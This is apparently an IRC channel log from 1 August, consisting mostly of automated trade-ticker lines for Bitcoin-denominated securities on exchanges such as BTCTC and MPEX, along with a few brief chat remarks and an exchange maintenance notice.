Aug 01 09:59:22 [BTCTC] [ACTIVEMINING] 25 @ 0.006102 = 0.1526 BTC [-] Aug 01 09:59:24 [BTCTC] [ACTIVEMINING] 25 @ 0.006101 = 0.1525 BTC [-] Aug 01 09:59:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00265 BTC [-] Aug 01 10:00:27 [BTCTC] [LABCOIN] 72 @ 0.0029 = 0.2088 BTC [-] Aug 01 10:00:35 [BTCTC] [ASICMINER-PT] 1 @ 4.133 BTC [+] Aug 01 10:00:36 [BTCTC] [LABCOIN] 1 @ 0.002871 BTC [-] Aug 01 10:00:40 [BTCTC] [LABCOIN] 92 @ 0.00287 = 0.264 BTC [-] Aug 01 10:00:54 [BTCTC] [LABCOIN] 20 @ 0.00286 = 0.0572 BTC [-] Aug 01 10:00:55 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0026 BTC [-] Aug 01 10:01:23 [BTCTC] [LABCOIN] 815 @ 0.00286 = 2.3309 BTC [-] Aug 01 10:01:28 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [+] Aug 01 10:01:30 [BTCTC] [LABCOIN] 101 @ 0.00298 = 0.301 BTC [+] Aug 01 10:01:30 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002493 = 0.005 BTC [-] Aug 01 10:01:37 [BTCTC] [BTCGARDEN] 1100 @ 0.016 = 17.6 BTC [+] Aug 01 10:01:41 [BTCTC] [LABCOIN] 1 @ 0.00287 BTC [-] Aug 01 10:01:42 dexX7_ http://trilema.com/2013/the-anatomy-of-a-scam/#comment-94217 Aug 01 10:01:45 clearly teh comments work lol Aug 01 10:02:11 [BTCTC] [BTCGARDEN] 61 @ 0.016 = 0.976 BTC [+] Aug 01 10:02:33 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 01 10:02:55 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 01 10:03:01 [BTCTC] [LABCOIN] 511 @ 0.002871 = 1.4671 BTC [+] Aug 01 10:03:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.0402 = 0.1206 BTC [-] Aug 01 10:03:08 [BTCTC] [LABCOIN] 12 @ 0.002979 = 0.0357 BTC [+] Aug 01 10:04:15 [BTCTC] [BTCGARDEN] 5250 @ 0.016 = 84 BTC [+] Aug 01 10:04:17 [BTCTC] [ASICMINER-PT] 1 @ 4.158 BTC [+] Aug 01 10:04:21 [BTCTC] [LABCOIN] 1174 @ 0.00287 = 3.3694 BTC [-] Aug 01 10:04:23 [BTCTC] [LABCOIN] 826 @ 0.002855 = 2.3582 BTC [-] Aug 01 10:04:40 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Aug 01 10:05:28 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 01 10:05:45 [BTCTC] [ACTIVEMINING] 50 @ 0.0061 = 0.305 BTC [-] Aug 01 10:05:50 [BTCTC] [ACTIVEMINING] 1 @ 0.0061 BTC [-] Aug 01 10:06:13 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 01 10:06:18 [BTCTC] [BTCGARDEN] 2246 @ 0.016 = 35.936 BTC [+] Aug 01 10:06:27 [BTCTC] [LABCOIN] 1 @ 0.00288 BTC [+] Aug 01 10:11:23 [BTCTC] [LABCOIN] 899 @ 0.00288 = 2.5891 BTC [+] Aug 01 10:11:28 [BTCTC] [LABCOIN] 1500 @ 0.00285 = 4.275 BTC [-] Aug 01 10:11:40 [BTCTC] [LABCOIN] 1659 @ 0.002805 = 4.6535 BTC [-] Aug 01 10:11:42 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Aug 01 10:11:45 [BTCTC] [LABCOIN] 2400 @ 0.0028 = 6.72 BTC [-] Aug 01 10:12:45 [HAVELOCK] [SDSTM] 1 @ 0.0089 BTC [+] Aug 01 10:13:38 [BTCTC] [LABCOIN] 1 @ 0.00285 BTC [+] Aug 01 10:13:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.04166 = 0.0833 BTC [+] Aug 01 10:15:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.04166 = 0.125 BTC [+] Aug 01 10:15:46 [BTCTC] [LABCOIN] 20 @ 0.0028 = 0.056 BTC [-] Aug 01 10:15:49 [BTCTC] [LABCOIN] 60 @ 0.002751 = 0.1651 BTC [-] Aug 01 10:15:53 [BTCTC] [LABCOIN] 739 @ 0.00275 = 2.0323 BTC [-] Aug 01 10:16:23 [BTCTC] [BTCGARDEN] 19 @ 0.016 = 0.304 BTC [+] Aug 01 10:16:27 [BTCTC] [BTCGARDEN] 19 @ 0.016 = 0.304 BTC [+] Aug 01 10:17:00 [BTCTC] [BTC-BOND] 3 @ 0.009999 = 0.03 BTC [+] Aug 01 10:17:11 [MPEX] [S.MPOE] 2304 @ 0.00080886 = 1.8636 BTC [+] Aug 01 10:17:13 [MPEX] [S.MPOE] 1300 @ 0.00080895 = 1.0516 BTC [+] Aug 01 10:17:16 [MPEX] [S.MPOE] 3096 @ 0.00080913 = 2.5051 BTC [+] Aug 01 10:17:22 [BTCTC] [BTCGARDEN] 220 @ 0.016 = 3.52 BTC [+] Aug 01 10:18:11 [BTCTC] [ACTIVEMINING] 25 @ 0.006095 = 0.1524 BTC [-] Aug 01 10:18:12 [BTCTC] [LABCOIN] 2488 @ 0.002849 = 7.0883 BTC [+] Aug 01 10:18:15 [BTCTC] [ACTIVEMINING] 37 @ 0.006096 = 0.2256 BTC [+] Aug 01 10:18:21 [BTCTC] [LABCOIN] 13 @ 0.00285 = 0.0371 BTC [+] Aug 01 10:19:27 [BTCTC] [BASIC-MINING] 4 @ 0.4577 = 1.8308 BTC [+] Aug 01 10:20:33 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Aug 01 10:20:44 [BTCTC] [LABCOIN] 15 @ 0.00285 = 0.0428 BTC [+] Aug 01 10:20:57 [BTCTC] [LABCOIN] 1 @ 0.00285 BTC [+] Aug 01 10:21:18 [BTCTC] [LABCOIN] 3000 @ 0.00285 = 8.55 BTC [+] Aug 01 10:21:24 [BTCTC] [BASIC-MINING] 1 @ 0.4578 BTC [+] Aug 01 10:22:55 [BTCTC] [LABCOIN] 132 @ 0.00285 = 0.3762 BTC [+] Aug 01 10:26:08 Apologies. Trading has been temporarily frozen for system maintenance. We'll be back in a minute or two Aug 01 10:26:57 mtgox ? Aug 01 10:27:08 btct Aug 01 10:27:50 back Aug 01 10:28:16 [BTCTC] [BTCGARDEN] 12 @ 0.016 = 0.192 BTC [+] Aug 01 10:28:35 yep its up Aug 01 10:29:10 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 10:29:58 [BTCTC] [LABCOIN] 30 @ 0.0028 = 0.084 BTC [-] Aug 01 10:30:27 [HAVELOCK] [SDSTM] 2 @ 0.0089 = 0.0178 BTC [+] Aug 01 10:30:31 [BTCTC] [LABCOIN] 1 @ 0.00279 BTC [-] Aug 01 10:30:48 [BTCTC] [LABCOIN] 60 @ 0.00275 = 0.165 BTC [-] Aug 01 10:30:48 [BTCTC] [LABCOIN] 9 @ 0.00271 = 0.0244 BTC [-] Aug 01 10:30:50 [BTCTC] [LABCOIN] 49 @ 0.002702 = 0.1324 BTC [-] Aug 01 10:30:51 [BTCTC] [LABCOIN] 20 @ 0.002702 = 0.054 BTC [-] Aug 01 10:30:52 [BTCTC] [LABCOIN] 102 @ 0.002701 = 0.2755 BTC [-] Aug 01 10:30:53 [BTCTC] [LABCOIN] 890 @ 0.0027 = 2.403 BTC [-] Aug 01 10:30:54 [BTCTC] [LABCOIN] 300 @ 0.0027 = 0.81 BTC [-] Aug 01 10:31:03 [BTCTC] [LABCOIN] 1296 @ 0.0027 = 3.4992 BTC [-] Aug 01 10:31:05 [BTCTC] [LABCOIN] 2542 @ 0.00285 = 7.2447 BTC [+] Aug 01 10:31:57 [BTCTC] [LABCOIN] 1296 @ 0.00285 = 3.6936 BTC [+] Aug 01 10:31:58 [BTCTC] [LABCOIN] 1 @ 0.002886 BTC [+] Aug 01 10:32:00 [BTCTC] [LABCOIN] 2000 @ 0.00294 = 5.88 BTC [+] Aug 01 10:32:00 [BTCTC] [LABCOIN] 998 @ 0.002947 = 2.9411 BTC [+] Aug 01 10:32:01 [BTCTC] [LABCOIN] 985 @ 0.002947 = 2.9028 BTC [+] Aug 01 10:32:42 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Aug 01 10:32:51 [BTCTC] [TAT.ASICMINER] 9 @ 0.04185 = 0.3767 BTC [+] Aug 01 10:33:01 [HAVELOCK] [AM100] 1 @ 0.0398999 BTC [-] Aug 01 10:33:50 [BTCTC] [ACTIVEMINING] 158 @ 0.00601 = 0.9496 BTC [-] Aug 01 10:33:52 [BTCTC] [ACTIVEMINING] 191 @ 0.006009 = 1.1477 BTC [-] Aug 01 10:33:53 [BTCTC] [ACTIVEMINING] 59 @ 0.006005 = 0.3543 BTC [-] Aug 01 10:33:55 [BTCTC] [ACTIVEMINING] 542 @ 0.005901 = 3.1983 BTC [-] Aug 01 10:33:58 [BTCTC] [LABCOIN] 778 @ 0.002948 = 2.2935 BTC [+] Aug 01 10:34:22 [BTCTC] [ACTIVEMINING] 8 @ 0.006099 = 0.0488 BTC [+] Aug 01 10:34:23 [BTCTC] [LABCOIN] 326 @ 0.002947 = 0.9607 BTC [-] Aug 01 10:34:25 [BTCTC] [ACTIVEMINING] 49 @ 0.0061 = 0.2989 BTC [+] Aug 01 10:34:56 [BTCTC] [LABCOIN] 616 @ 0.00298 = 1.8357 BTC [+] Aug 01 10:34:57 [BTCTC] [LABCOIN] 500 @ 0.00298 = 1.49 BTC [+] Aug 01 10:34:58 [BTCTC] [LABCOIN] 362 @ 0.002995 = 1.0842 BTC [+] Aug 01 10:35:00 [BTCTC] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Aug 01 10:35:01 [BTCTC] [LABCOIN] 40 @ 0.00304 = 0.1216 BTC [+] Aug 01 10:35:43 [BTCTC] [LABCOIN] 1231 @ 0.002947 = 3.6278 BTC [-] Aug 01 10:36:38 [BTCTC] [ACTIVEMINING] 1000 @ 0.0059 = 5.9 BTC [-] Aug 01 10:37:12 [BTCTC] [CRYPTO-TRADE] 40 @ 0.2 = 8 BTC [+] Aug 01 10:38:35 [BTCTC] [LABCOIN] 1000 @ 0.002999 = 2.999 BTC [+] Aug 01 10:38:37 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [+] Aug 01 10:38:38 [BTCTC] [LABCOIN] 1000 @ 0.00305 = 3.05 BTC [+] Aug 01 10:38:39 [BTCTC] [LABCOIN] 500 @ 0.003057 = 1.5285 BTC [+] Aug 01 10:38:40 [BTCTC] [LABCOIN] 700 @ 0.00306 = 2.142 BTC [+] Aug 01 10:39:21 [BTCTC] [LABCOIN] 444 @ 0.00307 = 1.3631 BTC [+] Aug 01 10:39:22 [BTCTC] [LABCOIN] 1556 @ 0.00307 = 4.7769 BTC [+] Aug 01 10:39:30 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [+] Aug 01 10:39:34 [BTCTC] [BTCGARDEN] 35 @ 0.016 = 0.56 BTC [+] Aug 01 10:40:16 [HAVELOCK] [SDSTM] 7 @ 0.0089 = 0.0623 BTC [+] Aug 01 10:40:22 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 01 10:41:29 [BTCTC] [TAT.ASICMINER] 54 @ 0.04184 = 2.2594 BTC [-] Aug 01 10:41:31 [BTCTC] [TAT.ASICMINER] 12 @ 0.04185 = 0.5022 BTC [+] Aug 01 10:41:33 [BTCTC] [LABCOIN] 1 @ 0.00305 BTC [-] Aug 01 10:42:23 [BTCTC] [LABCOIN] 1 @ 0.003 BTC [-] Aug 01 10:42:26 [BTCTC] [LABCOIN] 24 @ 0.003 = 0.072 BTC [-] Aug 01 10:42:28 [BTCTC] [LABCOIN] 1 @ 0.002851 BTC [-] Aug 01 10:42:29 [BTCTC] [LABCOIN] 770 @ 0.00285 = 2.1945 BTC [-] Aug 01 10:42:30 [BTCTC] [LABCOIN] 100 @ 0.00285 = 0.285 BTC [-] Aug 01 10:42:32 [BTCTC] [LABCOIN] 2105 @ 0.002647 = 5.5719 BTC [-] Aug 01 10:43:58 [BTCTC] [LABCOIN] 11 @ 0.00302 = 0.0332 BTC [+] Aug 01 10:44:30 [BTCTC] [LABCOIN] 950 @ 0.00302 = 2.869 BTC [+] Aug 01 10:44:37 [BTCTC] [LABCOIN] 850 @ 0.003 = 2.55 BTC [-] Aug 01 10:49:10 [BTCTC] [LABCOIN] 6 @ 0.002801 = 0.0168 BTC [-] Aug 01 10:49:12 [BTCTC] [LABCOIN] 25 @ 0.0028 = 0.07 BTC [-] Aug 01 10:49:13 [BTCTC] [LABCOIN] 5 @ 0.002753 = 0.0138 BTC [-] Aug 01 10:49:14 [BTCTC] [LABCOIN] 10 @ 0.002752 = 0.0275 BTC [-] Aug 01 10:49:16 [BTCTC] [LABCOIN] 1000 @ 0.002705 = 2.705 BTC [-] Aug 01 10:49:17 [BTCTC] [LABCOIN] 954 @ 0.002704 = 2.5796 BTC [-] Aug 01 10:50:19 [BTCTC] [LABCOIN] 6 @ 0.002949 = 0.0177 BTC [+] Aug 01 10:50:42 [BTCTC] [BTCGARDEN] 13 @ 0.01599 = 0.2079 BTC [-] Aug 01 10:50:44 [BTCTC] [BTCGARDEN] 987 @ 0.016 = 15.792 BTC [+] Aug 01 10:50:59 [BTCTC] [ASICMINER-PT] 3 @ 4.004 = 12.012 BTC [+] Aug 01 10:51:00 [BTCTC] [LABCOIN] 1967 @ 0.002707 = 5.3247 BTC [-] Aug 01 10:51:02 [BTCTC] [ASICMINER-PT] 2 @ 4.003 = 8.006 BTC [-] Aug 01 10:51:16 [BTCTC] [ASICMINER-PT] 5 @ 4.001 = 20.005 BTC [-] Aug 01 10:51:28 [HAVELOCK] [AM100] 2 @ 0.0398999 = 0.0798 BTC [-] Aug 01 10:51:46 [BTCTC] [ACTIVEMINING] 112 @ 0.006097 = 0.6829 BTC [+] Aug 01 10:51:48 [BTCTC] [ACTIVEMINING] 50 @ 0.006098 = 0.3049 BTC [+] Aug 01 10:51:49 [BTCTC] [ACTIVEMINING] 113 @ 0.0061 = 0.6893 BTC [+] Aug 01 10:54:58 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Aug 01 10:55:00 [BTCTC] [ASICMINER-PT] 3 @ 4 = 12 BTC [-] Aug 01 10:55:02 [MPEX] [S.MPOE] 1503 @ 0.00080913 = 1.2161 BTC [+] Aug 01 10:55:48 [BTCTC] [KENILWORTH] 2 @ 0.001501 = 0.003 BTC [-] Aug 01 10:56:23 [BTCTC] [LABCOIN] 1 @ 0.002947 BTC [+] Aug 01 10:58:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.04121 BTC [-] Aug 01 10:58:03 [BTCTC] [LABCOIN] 55 @ 0.002947 = 0.1621 BTC [+] Aug 01 10:58:16 [BTCTC] [LABCOIN] 278 @ 0.002947 = 0.8193 BTC [+] Aug 01 10:58:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.04121 BTC [-] Aug 01 10:58:56 [BTCTC] [TAT.ASICMINER] 8 @ 0.0412 = 0.3296 BTC [-] Aug 01 11:01:27 [BTCTC] [BTCGARDEN] 99 @ 0.016 = 1.584 BTC [+] Aug 01 11:01:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.041 = 0.082 BTC [-] Aug 01 11:01:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.04051 = 0.1215 BTC [-] Aug 01 11:02:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.04001 BTC [-] Aug 01 11:03:35 [BTCTC] [LABCOIN] 112 @ 0.002929 = 0.328 BTC [-] Aug 01 11:05:32 [BTCTC] [ASICMINER-PT] 1 @ 4.096 BTC [+] Aug 01 11:05:32 [BTCTC] [ASICMINER-PT] 1 @ 4.099 BTC [+] Aug 01 11:05:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.04119 BTC [+] Aug 01 11:07:17 [BTCTC] [DMS.PURCHASE] 1 @ 0.03353 BTC [+] Aug 01 11:07:22 [BTCTC] [ACTIVEMINING] 1 @ 0.005999 BTC [-] Aug 01 11:07:23 [BTCTC] [ACTIVEMINING] 50 @ 0.006097 = 0.3049 BTC [+] Aug 01 11:07:24 [BTCTC] [ACTIVEMINING] 168 @ 0.006098 = 1.0245 BTC [+] Aug 01 11:07:26 [BTCTC] [ACTIVEMINING] 81 @ 0.0061 = 0.4941 BTC [+] Aug 01 11:08:24 [BTCTC] [DMS.SELLING] 1 @ 0.02273 BTC [+] Aug 01 11:08:33 [BTCTC] [ACTIVEMINING] 10 @ 0.006099 = 0.061 BTC [-] Aug 01 11:10:13 [BTCTC] [KENILWORTH] 1 @ 0.001522 BTC [+] Aug 01 11:11:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.04119 = 0.206 BTC [+] Aug 01 11:12:23 [BTCTC] [BTCGARDEN] 21 @ 0.016 = 0.336 BTC [+] Aug 01 11:12:32 [BTCTC] [BTCGARDEN] 4000 @ 0.016 = 64 BTC [+] Aug 01 11:12:57 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 11:13:54 [BTCTC] [LABCOIN] 108 @ 0.002929 = 0.3163 BTC [-] Aug 01 11:15:24 [BTCTC] [LABCOIN] 300 @ 0.002753 = 0.8259 BTC [-] Aug 01 11:15:26 [BTCTC] [LABCOIN] 1254 @ 0.002753 = 3.4523 BTC [-] Aug 01 11:15:27 [BTCTC] [LABCOIN] 5000 @ 0.002753 = 13.765 BTC [-] Aug 01 11:15:29 [BTCTC] [LABCOIN] 8 @ 0.002752 = 0.022 BTC [-] Aug 01 11:15:30 [BTCTC] [LABCOIN] 207 @ 0.002751 = 0.5695 BTC [-] Aug 01 11:15:31 [BTCTC] [LABCOIN] 700 @ 0.002723 = 1.9061 BTC [-] Aug 01 11:15:32 [BTCTC] [LABCOIN] 1693 @ 0.00272 = 4.605 BTC [-] Aug 01 11:15:33 [BTCTC] [LABCOIN] 9650 @ 0.002715 = 26.1998 BTC [-] Aug 01 11:15:34 [BTCTC] [LABCOIN] 6000 @ 0.002701 = 16.206 BTC [-] Aug 01 11:15:57 [BTCTC] [LABCOIN] 5000 @ 0.002653 = 13.265 BTC [-] Aug 01 11:15:59 [BTCTC] [LABCOIN] 1000 @ 0.002653 = 2.653 BTC [-] Aug 01 11:16:00 [BTCTC] [LABCOIN] 25 @ 0.002651 = 0.0663 BTC [-] Aug 01 11:16:02 [BTCTC] [LABCOIN] 1500 @ 0.002651 = 3.9765 BTC [-] Aug 01 11:16:03 [BTCTC] [LABCOIN] 2000 @ 0.002641 = 5.282 BTC [-] Aug 01 11:16:04 [BTCTC] [LABCOIN] 1500 @ 0.002639 = 3.9585 BTC [-] Aug 01 11:16:05 [BTCTC] [LABCOIN] 1019 @ 0.002632 = 2.682 BTC [-] Aug 01 11:16:07 [BTCTC] [LABCOIN] 7210 @ 0.002631 = 18.9695 BTC [-] Aug 01 11:16:29 [BTCTC] [LABCOIN] 15600 @ 0.002754 = 42.9624 BTC [+] Aug 01 11:16:30 [BTCTC] [LABCOIN] 500 @ 0.002631 = 1.3155 BTC [-] Aug 01 11:16:31 [BTCTC] [LABCOIN] 1000 @ 0.00263 = 2.63 BTC [-] Aug 01 11:16:32 [BTCTC] [LABCOIN] 832 @ 0.002629 = 2.1873 BTC [-] Aug 01 11:16:34 [BTCTC] [LABCOIN] 1500 @ 0.002628 = 3.942 BTC [-] Aug 01 11:16:43 [BTCTC] [LABCOIN] 165 @ 0.002627 = 0.4335 BTC [-] Aug 01 11:16:46 [BTCTC] [LABCOIN] 5000 @ 0.002626 = 13.13 BTC [-] Aug 01 11:16:48 [BTCTC] [LABCOIN] 568 @ 0.002626 = 1.4916 BTC [-] Aug 01 11:18:10 [BTCTC] [ACTIVEMINING] 16 @ 0.006 = 0.096 BTC [-] Aug 01 11:18:11 [BTCTC] [ACTIVEMINING] 77 @ 0.006097 = 0.4695 BTC [+] Aug 01 11:18:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.04142 BTC [+] Aug 01 11:18:58 [BTCTC] [ACTIVEMINING] 7 @ 0.006097 = 0.0427 BTC [+] Aug 01 11:20:14 [BTCTC] [LABCOIN] 2500 @ 0.002654 = 6.635 BTC [+] Aug 01 11:20:28 [BTCTC] [LABCOIN] 5000 @ 0.002654 = 13.27 BTC [+] Aug 01 11:22:07 [BTCTC] [LABCOIN] 700 @ 0.002653 = 1.8571 BTC [-] Aug 01 11:22:09 [BTCTC] [LABCOIN] 432 @ 0.002626 = 1.1344 BTC [-] Aug 01 11:22:09 [BTCTC] [LABCOIN] 11368 @ 0.002625 = 29.841 BTC [-] Aug 01 11:23:13 [BTCTC] [LABCOIN] 30 @ 0.002666 = 0.08 BTC [+] Aug 01 11:23:14 [BTCTC] [LABCOIN] 970 @ 0.002625 = 2.5463 BTC [-] Aug 01 11:24:08 [BTCTC] [BTCGARDEN] 2 @ 0.01597 = 0.0319 BTC [-] Aug 01 11:24:10 [BTCTC] [BTCGARDEN] 15 @ 0.01596 = 0.2394 BTC [-] Aug 01 11:24:11 [BTCTC] [BTCGARDEN] 100 @ 0.01596 = 1.596 BTC [-] Aug 01 11:24:13 [BTCTC] [BTCGARDEN] 666 @ 0.01595 = 10.6227 BTC [-] Aug 01 11:24:14 [BTCTC] [BTCGARDEN] 2717 @ 0.01595 = 43.3362 BTC [-] Aug 01 11:25:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.04184 = 0.0837 BTC [+] Aug 01 11:26:09 [BTCTC] [TAT.MINIGAME] 215 @ 0.000265 = 0.057 BTC [-] Aug 01 11:26:36 [BTCTC] [BASIC-MINING] 2 @ 0.4554 = 0.9108 BTC [-] Aug 01 11:26:36 [BTCTC] [BASIC-MINING] 1 @ 0.4555 BTC [+] Aug 01 11:26:53 [BTCTC] [TAT.MINIGAME] 786 @ 0.0002622 = 0.2061 BTC [-] Aug 01 11:28:10 [BTCTC] [LABCOIN] 1000 @ 0.0027 = 2.7 BTC [+] Aug 01 11:28:24 [BTCTC] [LTC-ATF.B2] 4 @ 0.0103 = 0.0412 BTC [-] Aug 01 11:29:57 [MPEX] [S.MPOE] 1500 @ 0.00080721 = 1.2108 BTC [-] Aug 01 11:29:59 [MPEX] [S.MPOE] 8488 @ 0.00080626 = 6.8435 BTC [-] Aug 01 11:30:00 [MPEX] [S.MPOE] 3362 @ 0.00080363 = 2.7018 BTC [-] Aug 01 11:30:07 [BTCTC] [ASICMINER-PT] 2 @ 4.049 = 8.098 BTC [-] Aug 01 11:30:43 [BTCTC] [LABCOIN] 15 @ 0.002892 = 0.0434 BTC [+] Aug 01 11:33:16 [BTCTC] [ACTIVEMINING] 2 @ 0.006093 = 0.0122 BTC [-] Aug 01 11:33:17 [BTCTC] [LABCOIN] 1 @ 0.002891 BTC [-] Aug 01 11:33:39 [BTCTC] [DMS.SELLING] 51 @ 0.02201 = 1.1225 BTC [-] Aug 01 11:35:25 [BTCTC] [BTCGARDEN] 270 @ 0.016 = 4.32 BTC [+] Aug 01 11:37:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.04183 = 0.1255 BTC [-] Aug 01 11:38:50 [BTCTC] [LABCOIN] 154 @ 0.00275 = 0.4235 BTC [-] Aug 01 11:38:52 [BTCTC] [LABCOIN] 1000 @ 0.00275 = 2.75 BTC [-] Aug 01 11:38:53 [BTCTC] [LABCOIN] 5 @ 0.00275 = 0.0138 BTC [-] Aug 01 11:38:54 [BTCTC] [LABCOIN] 2 @ 0.00275 = 0.0055 BTC [-] Aug 01 11:39:04 [BTCTC] [LABCOIN] 1040 @ 0.002702 = 2.8101 BTC [-] Aug 01 11:39:06 [BTCTC] [LABCOIN] 1000 @ 0.002701 = 2.701 BTC [-] Aug 01 11:39:08 [BTCTC] [LABCOIN] 4000 @ 0.0027 = 10.8 BTC [-] Aug 01 11:39:09 [BTCTC] [LABCOIN] 174 @ 0.0027 = 0.4698 BTC [-] Aug 01 11:42:45 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Aug 01 11:44:19 [BTCTC] [ASICMINER-PT] 3 @ 4 = 12 BTC [-] Aug 01 11:44:56 [BTCTC] [BTCGARDEN] 1250 @ 0.016 = 20 BTC [+] Aug 01 11:45:10 [BTCTC] [BTCGARDEN] 74 @ 0.016 = 1.184 BTC [+] Aug 01 11:45:38 [BTCTC] [LABCOIN] 1 @ 0.0027 BTC [-] Aug 01 11:45:40 [BTCTC] [LABCOIN] 1 @ 0.0027 BTC [-] Aug 01 11:45:41 [BTCTC] [LABCOIN] 22 @ 0.002631 = 0.0579 BTC [-] Aug 01 11:51:51 [BTCTC] [TAT.ASICMINER] 3 @ 0.04181 = 0.1254 BTC [-] Aug 01 11:52:13 [BTCTC] [LABCOIN] 1000 @ 0.002632 = 2.632 BTC [+] Aug 01 11:52:14 [BTCTC] [LABCOIN] 1878 @ 0.002631 = 4.941 BTC [-] Aug 01 11:52:16 [BTCTC] [LABCOIN] 1727 @ 0.00263 = 4.542 BTC [-] Aug 01 11:52:17 [BTCTC] [LABCOIN] 40 @ 0.002626 = 0.105 BTC [-] Aug 01 11:52:17 [BTCTC] [LABCOIN] 4162 @ 0.002625 = 10.9253 BTC [-] Aug 01 11:52:19 [BTCTC] [LABCOIN] 75 @ 0.002624 = 0.1968 BTC [-] Aug 01 11:52:20 [BTCTC] [LABCOIN] 1000 @ 0.002602 = 2.602 BTC [-] Aug 01 11:52:21 [BTCTC] [LABCOIN] 100 @ 0.0026 = 0.26 BTC [-] Aug 01 11:52:22 [BTCTC] [ASICMINER-PT] 1 @ 3.989 BTC [-] Aug 01 11:52:24 [BTCTC] [LABCOIN] 1000 @ 0.0026 = 2.6 BTC [-] Aug 01 11:52:26 [BTCTC] [LABCOIN] 1000 @ 0.0026 = 2.6 BTC [-] Aug 01 11:53:08 [BTCTC] [LABCOIN] 494 @ 0.002551 = 1.2602 BTC [-] Aug 01 11:53:10 [BTCTC] [LABCOIN] 100 @ 0.00255 = 0.255 BTC [-] Aug 01 11:53:11 [BTCTC] [LABCOIN] 20 @ 0.002526 = 0.0505 BTC [-] Aug 01 11:53:12 [BTCTC] [LABCOIN] 2500 @ 0.002526 = 6.315 BTC [-] Aug 01 11:53:13 [BTCTC] [LABCOIN] 20 @ 0.002526 = 0.0505 BTC [-] Aug 01 11:53:14 [BTCTC] [LABCOIN] 100 @ 0.002525 = 0.2525 BTC [-] Aug 01 11:53:15 [BTCTC] [LABCOIN] 100 @ 0.002525 = 0.2525 BTC [-] Aug 01 11:53:16 [BTCTC] [LABCOIN] 2000 @ 0.002525 = 5.05 BTC [-] Aug 01 11:53:18 [BTCTC] [LABCOIN] 11800 @ 0.002525 = 29.795 BTC [-] Aug 01 11:53:19 [BTCTC] [LABCOIN] 7737 @ 0.002524 = 19.5282 BTC [-] Aug 01 11:53:20 [BTCTC] [LABCOIN] 1 @ 0.002523 BTC [-] Aug 01 11:53:21 [BTCTC] [LABCOIN] 1000 @ 0.002523 = 2.523 BTC [-] Aug 01 11:53:22 [BTCTC] [LABCOIN] 2000 @ 0.002523 = 5.046 BTC [-] Aug 01 11:53:24 [BTCTC] [LABCOIN] 75 @ 0.00252 = 0.189 BTC [-] Aug 01 11:53:24 [BTCTC] [LABCOIN] 779 @ 0.00252 = 1.9631 BTC [-] Aug 01 11:53:25 [BTCTC] [LABCOIN] 2000 @ 0.002518 = 5.036 BTC [-] Aug 01 11:53:28 [BTCTC] [LABCOIN] 170 @ 0.002515 = 0.4276 BTC [-] Aug 01 11:53:33 [BTCTC] [LABCOIN] 5750 @ 0.002511 = 14.4383 BTC [-] Aug 01 11:53:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.04144 BTC [-] Aug 01 11:53:36 [BTCTC] [LABCOIN] 900 @ 0.002506 = 2.2554 BTC [-] Aug 01 11:53:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.04143 BTC [-] Aug 01 11:53:39 [BTCTC] [LABCOIN] 50 @ 0.002506 = 0.1253 BTC [-] Aug 01 11:53:41 [BTCTC] [LABCOIN] 90 @ 0.002501 = 0.2251 BTC [-] Aug 01 11:53:42 [BTCTC] [LABCOIN] 400 @ 0.002501 = 1.0004 BTC [-] Aug 01 11:53:42 [BTCTC] [LABCOIN] 149 @ 0.0025 = 0.3725 BTC [-] Aug 01 11:53:44 [BTCTC] [LABCOIN] 1 @ 0.0025 BTC [-] Aug 01 11:53:45 [BTCTC] [LABCOIN] 1000 @ 0.0025 = 2.5 BTC [-] Aug 01 11:53:46 [BTCTC] [LABCOIN] 1500 @ 0.0025 = 3.75 BTC [-] Aug 01 11:53:47 [BTCTC] [LABCOIN] 3200 @ 0.0025 = 8 BTC [-] Aug 01 11:53:49 [BTCTC] [LABCOIN] 100 @ 0.0025 = 0.25 BTC [-] Aug 01 11:53:50 [BTCTC] [LABCOIN] 3585 @ 0.0025 = 8.9625 BTC [-] Aug 01 11:53:51 [BTCTC] [LABCOIN] 8000 @ 0.0025 = 20 BTC [-] Aug 01 11:53:52 [BTCTC] [LABCOIN] 80 @ 0.0025 = 0.2 BTC [-] Aug 01 11:53:53 [BTCTC] [LABCOIN] 1000 @ 0.0025 = 2.5 BTC [-] Aug 01 11:54:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.04142 BTC [-] Aug 01 11:54:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.0401 = 0.0802 BTC [-] Aug 01 